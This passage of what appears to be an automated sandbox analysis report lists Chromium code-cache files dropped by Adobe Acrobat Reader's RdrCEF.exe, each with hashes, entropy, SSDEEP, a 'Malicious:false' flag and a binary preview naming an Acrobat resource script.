                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):232
                                                                  Entropy (8bit):5.666649881214925
                                                                  Encrypted:false
                                                                  SSDEEP:6:mNtVYOFLvEWdFCi5RsNykoltplbuiWulHyA1:IbRkiDhjljWus
                                                                  MD5:C7EC1413A93E029BB59D72C6BAA9B74B
                                                                  SHA1:2347E12F4A6058F974CF3722BF0CCE2E8F523FE6
                                                                  SHA-256:E8136196C30373F6F20A9477AA552C3343C0E561BC46973471A7E1D4A1CB4434
                                                                  SHA-512:C0BE838F9F192D22505A35A1E40E4E374E79307A9AA7B0B5ABD63E1130D76DA2BB1C4620078FB66EED343983E078D9044F8CC0BD8DC951A65538A4B5251B0DD8
                                                                  Malicious:false
                                                                  Preview:0\r..m......h.....'....._keyhttps://rna-resource.acrobat.com/static/js/plugins/aicuc/js/plugins/rhp/exportpdf-rna-tool-view.js .C....[/....."#.D..l.;..A.A..Eo......p3.8..........8 P..a...R..Y....7.@..2Dm{..A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0f25049d69125b1e_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):210
                                                                  Entropy (8bit):5.571941014597752
                                                                  Encrypted:false
                                                                  SSDEEP:6:m+yiXYOFLvEWd7VIGXVumbAltbVyh9PT41:pyixRu7pV41T
                                                                  MD5:11DE5619BD600E5319C3FD75E9142EBB
                                                                  SHA1:6F1FEEE2530FC93A77280D56DE076C332178CE9E
                                                                  SHA-256:26FC923690D1DC18867AFE660283D9A12251087EB6EBD9F29A2232A0F5D1E040
                                                                  SHA-512:756D8C3C18A8A7C8A73FE20B29C4628E8F39C399F32942058844619135AFE86600B131BCB4E182E1017E3443F76D1BD32ED76912120BC63F63D05D0256470D0B
                                                                  Malicious:false
                                                                  Preview:0\r..m......R...kP]g...._keyhttps://rna-resource.acrobat.com/static/js/plugins/app-center/js/selector.js ..HC..[/....."#.D.(=.;..A.A..Eo..................k.Q.....-_..y.....O...>..1....A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\230e5fe3e6f82b2c_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):216
                                                                  Entropy (8bit):5.609925363128875
                                                                  Encrypted:false
                                                                  SSDEEP:3:m+lifll08RzYOCGLvHkWBGKuKjXKoyNjXKLuV+wKlfgBD1Mkt0BlYo2sZI8xeGvA:mvYOFLvEWdhwjQlwKu1ltK3ZIl6P41
                                                                  MD5:544FCD8A3846ACAF159916757DFAAC1B
                                                                  SHA1:9C01AA2863C7501CF0679B781B9C381284809F90
                                                                  SHA-256:854299F0157864057471647B4004BC815325FDFCD4A7C35FFA0D084259F2EC08
                                                                  SHA-512:377F591F795F591144FB9D43ACACC3910A9444220FD293568766852BAF015B2DC9AFD4882B6E27B9FB277884D3FC7A30BBDE40638F6824F18B554068E0EE36B0
                                                                  Malicious:false
                                                                  Preview:0\r..m......X.....V....._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/plugin.js ..t?..[/....."#.D..$.;..A.A..Eo.......) u.........].>....uUf..N...k......c..l.A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2798067b152b83c7_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):209
                                                                  Entropy (8bit):5.55609035441626
                                                                  Encrypted:false
                                                                  SSDEEP:3:m+lZd8RzYOCGLvHkWBGKuKjXKX7KoQRA/KVdKLuVDFe4qMktWtrcyxMtv9EWm1:mJYOFLvEWdGQRQOdQPltWlD6g1
                                                                  MD5:3BBE28D38343070C3F47B6D94708888D
                                                                  SHA1:2FB36F6D9B0443E93624CBB901E0D8C84B36F55B
                                                                  SHA-256:DBA7DCB237981DBA864A21A0AE02A1D9D7471D9E94A7E0E2D7B190D27FDD368D
                                                                  SHA-512:A83E3A5471FF1122BB7119EA91CB64B27CCC9313CBE8CA26A6CD033F95DF0E5BCF3A5DA36B7C16B942D3683E6F7635ACE7344309C22D133823CBE4D7389787AA
                                                                  Malicious:false
                                                                  Preview:0\r..m......Q..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/plugin.js .*,D..[/....."#.Dff=.;..A.A..Eo......N._b..........c..y/L....|y.n..C/I.....X7-ne.A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2a426f11fd8ebe18_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):179
                                                                  Entropy (8bit):5.603225108228782
                                                                  Encrypted:false
                                                                  SSDEEP:3:m+lLp08RzYOCGLvHkfaMMuVNlTkUoMktDlrQMWqg4nRb7om5m1:mOYOFLvECMLNlIUoltDlcuR/41
                                                                  MD5:F43B8CF2FDB7C8B305D5314F4037643F
                                                                  SHA1:2E0933D27356460DCB3F85759E0BF8D2982C86FD
                                                                  SHA-256:F6C728617EBFD0FFE2F92C447A6A4CBAB74766014EBBCCBC77FFCD61B757CF46
                                                                  SHA-512:9A1A2968FEFA91857BF443C32D96561CFB2D06430339D17FB21CF4C5010EAAD657CEFBF8E608F8BC7AC2C000ADD35FE5007C89A2E3B41FCC583412AB73766DA8
                                                                  Malicious:false
                                                                  Preview:0\r..m......3....<lb...._keyhttps://rna-resource.acrobat.com/base_uris.js ...,..[/....."#.D...;..A.A..Eo......8n.'.........y...L<?W.Xi..A\Q3...J.}...d..~G.A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\3a4ae3940784292a_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):214
                                                                  Entropy (8bit):5.535968560319436
                                                                  Encrypted:false
                                                                  SSDEEP:6:m4fPYOFLvEWdtuNOFlt+/pby0zBUKSAA1:pRro/pb
                                                                  MD5:B02DD7631E60820B6D586D3E0D2A0029
                                                                  SHA1:22C7CD4D6412DA317C0D61943789227173CA97E8
                                                                  SHA-256:8B8DE8E218563D82A13E2F02A4DEB6A28AC2F155521F73FA3148E1D96B9B31FD
                                                                  SHA-512:6A7C81B49115F5F9B93FD0B2D11AB3617D77581B474CDA9745724464F8F54557268982AE78E89F4DC88B97868FCEA744D9D55F456C0A4ACE7C5B0B9620BAB299
                                                                  Malicious:false
                                                                  Preview:0\r..m......V..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/search-summary/js/selector.js ...D..[/....."#.D[.<.;..A.A..Eo........9.........Q..E.=....=h`t..t..3%A.F$..w..A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4a0e94571d979b3c_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):177
                                                                  Entropy (8bit):5.495962469739915
                                                                  Encrypted:false
                                                                  SSDEEP:3:m+l64HXlA8RzYOCGLvHkjXMLOWFvz+iO8doMktVHl+d1dn76KohyP5m1:md4HXXYOFLvEjMSWFvzlTdolt2jUdyPo
                                                                  MD5:8AAA0B3EC709C5A6420D9D261E34D520
                                                                  SHA1:292E2DC98BD874CAC30B36713C2F1626B76BADC0
                                                                  SHA-256:88943FAE22EFB2E2F0E4ECD580820170B6ABA96405B6EB0F493646BFA9B84F36
                                                                  SHA-512:48E170305C43224BF8C7132F67F2B73A52C3F22F52AFC4E2BE94EBDDCE29A416303F781B719DB8945C392106F78EA79C3C4AE5A68C79E4618D4229168E33AB28
                                                                  Malicious:false
                                                                  Preview:0\r..m......1......5...._keyhttps://rna-resource.acrobat.com/plugins.js ...,..[/....."#.D7..;..A.A..Eo.........j.........PU ....t^.....a.k..u.7.M.BW6#}..A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\560e9c8bff5008d8_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):187
                                                                  Entropy (8bit):5.565263634729628
                                                                  Encrypted:false
                                                                  SSDEEP:3:m+lpSUlIv8RzYOCGLvHkWBGKuK2fKVLWeswKDS/MkteHl/lRUPqf9tsDMaPV44m1:mkl9YOFLvEWsfOLgG/lteHiPqVyM+VY1
                                                                  MD5:FC25F75B634920F33E1D1A3B133C87FC
                                                                  SHA1:D55FD2A7E1EE5665714BA7D780A4FC3CDB41C95D
                                                                  SHA-256:F2EA44FEF3C96DD9FF7B054A41458EA249D82145A77C149CFAA13213DA783616
                                                                  SHA-512:DC38712F12D7A74FE29C1B62E68A6F065B723527E0D946A91616C7C4BF9F71C481DFCC71CE81D18E8F76310179345244727E193A93F0062F11AE985AE77B073B
                                                                  Malicious:false
                                                                  Preview:0\r..m......;...I......._keyhttps://rna-resource.acrobat.com/static/js/desktop.js .F.;..[/....."#.D....;..A.A..Eo......l.1...........q.O...j....._y..L^z...?..@N..A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\56c4cd218555ae2b_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):244
                                                                  Entropy (8bit):5.620507343590826
                                                                  Encrypted:false
                                                                  SSDEEP:6:mt9YOFLvEWdVFLBKFjVFLBKFlyxsD4qltigtwSeKaT9pr1:URVFAFjVFAFjTogtwSeKaTL
                                                                  MD5:3A9E004320EABD484614A65D48339A6B
                                                                  SHA1:FB9D423CE4B86DE3E6EEB379E71D38FC2C536F1E
                                                                  SHA-256:30AC88F30CDD7C3DCDE8A0F9F3B8DDFFE82E285DB67FBA9ECC0AF46199B95DBE
                                                                  SHA-512:6713C9E70A9A4BC9FCA0FD4E376D51CC9626752B1F54C9A68FE7D09BC48F4C2E9EC8FED21845141CEB3017740C8D3532564EEC6070F838FBA7FF2F971C9C2255
                                                                  Malicious:false
                                                                  Preview:0\r..m......t...R.1<...._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/plugin.js ..(D..[/....."#.DH.G.;..A.A..Eo........_B..............H...{...2../.k`..r4.C. .A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6fb6d030c4ebbc21_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):211
                                                                  Entropy (8bit):5.512522683193306
                                                                  Encrypted:false
                                                                  SSDEEP:3:m+lx4F08RzYOCGLvHkWBGKuKjXKGBIEGdevA/KPWFvAsXTZ4qMktG/hyrpYFm1:ms2VYOFLvEWdvBIEGdeXuisjrltL11
                                                                  MD5:943C737A97836A4E4CEDE9D85F3D5B6C
                                                                  SHA1:F7B90E04088BE51272BEE33FDA6A47D3A6CECBE6
                                                                  SHA-256:A70B1189BF671601B7EBA7C4EFB1132044373427961D8CB7028A9EB5A54D27D3
                                                                  SHA-512:7725C4882569FDD28695F05A21B09F32BF16DBCA227C29489DFDE0934F37F5241FF2C800B163BDB7AB1A8E3AB16416DE2961A1511E28E214E893540105FB964D
                                                                  Malicious:false
                                                                  Preview:0\r..m......S...]......._keyhttps://rna-resource.acrobat.com/static/js/plugins/add-account/js/selector.js .@.B..[/....."#.Du.<.;..A.A..Eo......9.^..........A.o]@r..Q.....<w.....].n\....A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\7120c35b509b0fae_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):202
                                                                  Entropy (8bit):5.645434370199556
                                                                  Encrypted:false
                                                                  SSDEEP:6:maVYOFLvEWdwAPCQV/3xltfX7xm7OhKlvA1:RbR16i/3TpLxmJ
                                                                  MD5:0B5AE2A10D9826E61D8E7EA01AD2E840
                                                                  SHA1:A1078D7E505816F42B6362195F151122448D94E6
                                                                  SHA-256:C2635D94F0CB4E5B2B365545F920AE4F1C92A2A6EB372AE67652A8FCE000C877
                                                                  SHA-512:05DC66DA69C13108E8AE192A315945299D7FEB11CCD4205248CF8050C29129237D06F6711E5EFAD96AB4956FC3CC70A80499F345B4B7D3A1BF96807C04E68F77
                                                                  Malicious:false
                                                                  Preview:0\r..m......J......{...._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/plugin.js ..p?..[/....."#.D.D$.;..A.A..Eo....................4T].....Tw.....(..b...EO....9.A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\71febec55d5c75cd_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):211
                                                                  Entropy (8bit):5.609125926654267
                                                                  Encrypted:false
                                                                  SSDEEP:3:m+lx2gv8RzYOCGLvHkWBGKuKjXKX7KoQRA/KWEKPWFvKmu8qMktgFdF5YufMm1:ms2gEYOFLvEWdGQRQVuY8qlt6dFt1
                                                                  MD5:9C121F53BEDE559708C47FF9038EC560
                                                                  SHA1:3A95274276A5F8811650AE8799CCE7C949F48C86
                                                                  SHA-256:4982EA452C5A9EF9B4D53FCE378B9E54AD72D6D5D289D5521696F6AD782253BF
                                                                  SHA-512:2F7B0937250EBC5C8BC608CA4BEC0430717E884F5CAFD9AA13D896764EC7F281F4E4AA3966D92CD4014BF232729E7F48C6F595B825B46476A14D54E6ABE85DA1
                                                                  Malicious:false
                                                                  Preview:0\r..m......S...W.%z...._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/selector.js ..B..[/....."#.D+.<.;..A.A..Eo........r.........@..{o]...9o|..qY....T....{..u.b..A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\86b8040b7132b608_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):206
                                                                  Entropy (8bit):5.635654890341895
                                                                  Encrypted:false
                                                                  SSDEEP:3:m+lerlyv8RzYOCGLvHkWBGKuKjXKX+IAHKLuVJ6vooe1MktwIEnNWQ1SUm1:mzyEYOFLvEWdrIOQhoD1ltwIEt1S/1
                                                                  MD5:FCB09B1ABF676F113FF2DB15C4B9E49C
                                                                  SHA1:720373A94739B78B44B33AF17BCAEAAEC871D4B5
                                                                  SHA-256:44F2FB25B045B564F6E31BF210CEC8C849AD4FC8E36DB948B9479253CC67A1F7
                                                                  SHA-512:9EDBB38901A6D07CAD923808B2D31D5C512482ED1CA7FC08E9F77F0A21AE4E7D4C98F4F41A27AE9381FC9C32469E1131B2EC66D58912D28B968E7FA40DB3407A
                                                                  Malicious:false
                                                                  Preview:0\r..m......N..../......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/plugin.js ...<..[/....."#.D$E..;..A.A..Eo......,.)..........t\a......x5.'OuE.C..@......x..A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c159cc5880890bc_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):218
                                                                  Entropy (8bit):5.551888887397364
                                                                  Encrypted:false
                                                                  SSDEEP:3:m+lKcv8RzYOCGLvHkWBGKuKjXKoyNH/KPWFvJujm/e7xMkt4/lolwJNqww6U+5m1:mnYOFLvEWdhwyujRW1ltPlwrqwK+41
                                                                  MD5:B2601D58EA04D48C67A3D0324EA8120B
                                                                  SHA1:1FC9260A88272DEF94FDCA5736F8E21A2D760642
                                                                  SHA-256:A49AC5F88E9C93A7CC40C4620D7E416C5874772EEF05EA721B29E7855CBE99C2
                                                                  SHA-512:99A8417C6A075DF489772D0982C097F0F560186662EE50268B6ECCFAB0872FC0A2E755BEAA9ABE6CFE8CFD1687AAB5E2AB0FAD87259633BA53779481C8B3618F
                                                                  Malicious:false
                                                                  Preview:0\r..m......Z.........._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/selector.js .,n?..[/....."#.DB.#.;..A.A..Eo.........................7...o..a=.98I......(3.$G.A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c84d92a9dbce3e0_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):230
                                                                  Entropy (8bit):5.552785979145268
                                                                  Encrypted:false
                                                                  SSDEEP:6:mYXYOFLvEWdrROk/RJbuxIultMlQfO441:/RrROk/iIU6lQfL
                                                                  MD5:2B7592FE520387531C0F9515D37C957E
                                                                  SHA1:A061822011A0C2FA23B46012B439B763FE1AD82C
                                                                  SHA-256:12430B81EEA488B23B35A7AA5EC31271B20AEEDAF3613E93CBDCD4E9C1328254
                                                                  SHA-512:8CA7AC85943D9E14F26C43384A9B77B12D9D6214FF32B7B2533D2BA904945F61E66B6D2EEABB3E8D7A7D19ABACBBDD59DF36AE00902468F955954C3BD0286F1C
                                                                  Malicious:false
                                                                  Preview:0\r..m......f...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/selector.js ...<..[/....."#.D.-..;..A.A..Eo........o...........~..rw.+[....!.)?..f.U..(=.=.A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8e417e79df3bf0e9_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):186
                                                                  Entropy (8bit):5.567305610867358
                                                                  Encrypted:false
                                                                  SSDEEP:3:m+lhD4ll08RzYOCGLvHkWBGKuKdTSVRj1qMktj//HzoIN1OFPL4m1:mmDEYOFLvEWXIRRqltj/fzV1QPLr1
                                                                  MD5:9DE46BF3529D890B97670DFE69C8A202
                                                                  SHA1:5368C847D53EBE7B3F6A5FC7443C8AE8D359489D
                                                                  SHA-256:024A582D7B39AA57A3FF19126A8919148E304123EFE8F7476EDB4E514C2F486F
                                                                  SHA-512:7539D9B0A9D6E238A98F3A6EF642C38DE61D7151AB28C6E9B951986E8E15708250A5619C89DD2B8AAFA281D183D0E79FF3324B0DB0072E07B66388538A883CF3
                                                                  Malicious:false
                                                                  Preview:0\r..m......:....f......_keyhttps://rna-resource.acrobat.com/static/js/config.js ...;..[/....."#.Di...;..A.A..Eo.........B..........~]...%s..<...n.f..<.....1#..U..A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\91cec06bb2836fa5_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):207
                                                                  Entropy (8bit):5.616641386336705
                                                                  Encrypted:false
                                                                  SSDEEP:3:m+l+nq1A8RzYOCGLvHkWBGKuKjXKLNfKPWFvlmjazAWkxMktbtm8D6EsEJeUm1:m52YOFLvEWdMAuOltbMEvsEJ41
                                                                  MD5:934724277EA0A40C400D04579F168EC2
                                                                  SHA1:E320D257D649C016AC06146BE64BBB144579CB7D
                                                                  SHA-256:63726CB73CCB4EB2718265FB413817CDBCEA3474511E9C755C62B684F65465FA
                                                                  SHA-512:3BA4FBB4C008866F4B5D699F2A242D3457215DAEE4DC29E3AA0D24FE360ED4E7350E03AB6F0AAFB1E01DB6B1B3E6ED2B52F1DB51EB17BEDEFA8E790DF47E8542
                                                                  Malicious:false
                                                                  Preview:0\r..m......O...a.Y....._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/selector.js .^.C..[/....."#.D..<.;..A.A..Eo.......vY...........z._a...'.v.......4p3..1.']...A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\927a1596c37ebe5e_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):210
                                                                  Entropy (8bit):5.611895107576625
                                                                  Encrypted:false
                                                                  SSDEEP:6:mYilPYOFLvEWd8CAdAuBbrW1qltHong1:6lJRCrW1QBo
                                                                  MD5:74089D53C6D33D4BD0023C6573BAAC6A
                                                                  SHA1:9FB8E235AB98746A00ED1BBB06C86AC80BBA52F1
                                                                  SHA-256:C42F3B99AABD81E76BB2FB79FC59A67142BDDA976502511F8EC62D9F5E9AC07D
                                                                  SHA-512:E26BEB139715F52E21E2F9F3FA307CBA27BBC313AFF5704436D5177853D0C1331DF2326FC397D34B39481685881ED336ACC3AFE7D7F80F18ACE3A5EAE26F6C5D
                                                                  Malicious:false
                                                                  Preview:0\r..m......R....|....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/selector.js ..PC..[/....."#.Dz.<.;..A.A..Eo......Tc..........c}.H7M=M..-.....Ix..R.l...}Rl.$q.A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\92c56fa2a6c4d5ba_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):223
                                                                  Entropy (8bit):5.592956282532991
                                                                  Encrypted:false
                                                                  SSDEEP:6:mY8nYOFLvEWdrROk/IuDKWakxlty1N16wG1:F8hRrROk/ZKiT4
                                                                  MD5:87D61B99CDCF711718CEA1AC5BB659D6
                                                                  SHA1:156EDB7E81CF4F2382AAE9905B16A779DFD4DB71
                                                                  SHA-256:7B447A968F340AC9E761F2045D81B171E6EC93C40C9DF723BD540AA7C48E3874
                                                                  SHA-512:B89E0910087FBCDDF8605788B5BFF403708402CF4143048827EF644DE010800CBFAFFFA93787EFC13B07C16346BEC05C3CBD39E727BA5CC6454AFE1082032CB9
                                                                  Malicious:false
                                                                  Preview:0\r..m......_...h......_keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/selector.js ..<..[/....."#.D....;..A.A..Eo......f.b..........%.k.SZ..~W.....:)'B..ad......A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\946896ee27df7947_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):213
                                                                  Entropy (8bit):5.649428936371276
                                                                  Encrypted:false
                                                                  SSDEEP:3:m+lstxt08RzYOCGLvHkWBGKuKjXKX+IAuAJVKjXKLuVT/LY/Mkti/QPmJelc0Rm1:mLrnYOFLvEWdrIoJUQYDulti/QeJIi1
                                                                  MD5:E1ED2581FEBDED5AF6D8D2CCB72CFE55
                                                                  SHA1:75282D1012D26A964E055AE6375DCC442AD4AD25
                                                                  SHA-256:3F432140405C828D26C6642471294723F6575E08E811FDB20077D295413C0F3F
                                                                  SHA-512:98EEFF4401509F357DAAD6F39D3DE8E01CE8203A5F3F11888F254F897A0221B2496DCF4F494E6375E2644C1898E71768D6926B4098D4EB6246B4EBDC12411BE6
                                                                  Malicious:false
                                                                  Preview:0\r..m......U..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files-select/js/plugin.js .t.<..[/....."#.D>y..;..A.A..Eo........3..........;"./N_.,.:C..2....9L.H...3:...A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\983b7a3da8f39a46_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):208
                                                                  Entropy (8bit):5.578110731955168
                                                                  Encrypted:false
                                                                  SSDEEP:3:m+lQ/pqv8RzYOCGLvHkWBGKuKjXKX+IALKPWFvV6BjD71/MktiH/6mgmOZLhT7Uy:mOEYOFLvEWdrIhuapD7xltEzgm2d/1
                                                                  MD5:155A23CBE99689360AA456B860F3E84D
                                                                  SHA1:E5817872B8A1084866976EAEA1BCD93E59266B15
                                                                  SHA-256:D950B1910C50BB1F89B6EB8E66BA56B5100F8D44727499DAB88562E1261DAD90
                                                                  SHA-512:AB9B5D9CD772EABC961FA4589DC5649677426771B86D108C7176E73D66548160C42057A0427A0FCF6262EF5154002B185330BA7B494400C56F88BEF3F685CD28
                                                                  Malicious:false
                                                                  Preview:0\r..m......P....r......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/selector.js .b.<..[/....."#.D.Y..;..A.A..Eo......C}..........Z.Z}Q..4.o....0+..[|..n:*..U.W.A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\aba6710fde0876af_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):188
                                                                  Entropy (8bit):5.552375129873544
                                                                  Encrypted:false
                                                                  SSDEEP:3:m+l8UElLA8RzYOCGLvHkWBGKuKPK7Cv3IXGoMkt9sBiaQ562HvpMm1:mAElVYOFLvEW1KrWoltLx56uvp1
                                                                  MD5:59529C01F444692276A297BCD824DF37
                                                                  SHA1:7A23EE36392FD8C14AD6AA466D19BEEC9579A577
                                                                  SHA-256:8D10417593B28482B1E0E8523CABA02E34531FE41D396E490DA43F942C0D05FA
                                                                  SHA-512:820B7C45F109AF051607E56E2EA8614812F1EEBD1AC9D198211BB348768C77CC9CACEADD455276DC48329ECA749CF583AD56EE47392E7E087F62F97DA5AFDFDD
                                                                  Malicious:false
                                                                  Preview:0\r..m......<...)6......_keyhttps://rna-resource.acrobat.com/static/js/rna-main.js .a10..[/....."#.D_..;..A.A..Eo........kD........z?...SwC...^..y.....V..7R-O.....A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\b6d5deb4812ac6e9_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):214
                                                                  Entropy (8bit):5.651471255775398
                                                                  Encrypted:false
                                                                  SSDEEP:6:mWYOFLvEWdBJvvuY3oYltG4TUDLYtmOZn1:xRBJzDvYDcFZ
                                                                  MD5:E6F2C50A308615DEE38F4521C9BCF5E4
                                                                  SHA1:9D566DACBD9214BF45C5FBE658A152591BA0075A
                                                                  SHA-256:2979BA2B854375D3F9106F07DF5C1066179D94259644D775ED381B5934468D4B
                                                                  SHA-512:26DAE1A8A8E4D6553D9897E5BA15B6C2176FE8336222604B88B14A8CAE09CA284D880D372A671CB49DEBCC1BF80039EAAB2217278645F09BE4413A4B2020054B
                                                                  Malicious:false
                                                                  Preview:0\r..m......V.....h....._keyhttps://rna-resource.acrobat.com/static/js/plugins/activity-badge/js/selector.js ...C..[/....."#.D~.<.;..A.A..Eo.......^.............t.q..W.EZ....1...[.zC.7mD..A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bba29d2e6197e2f4_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):211
                                                                  Entropy (8bit):5.613290832713582
                                                                  Encrypted:false
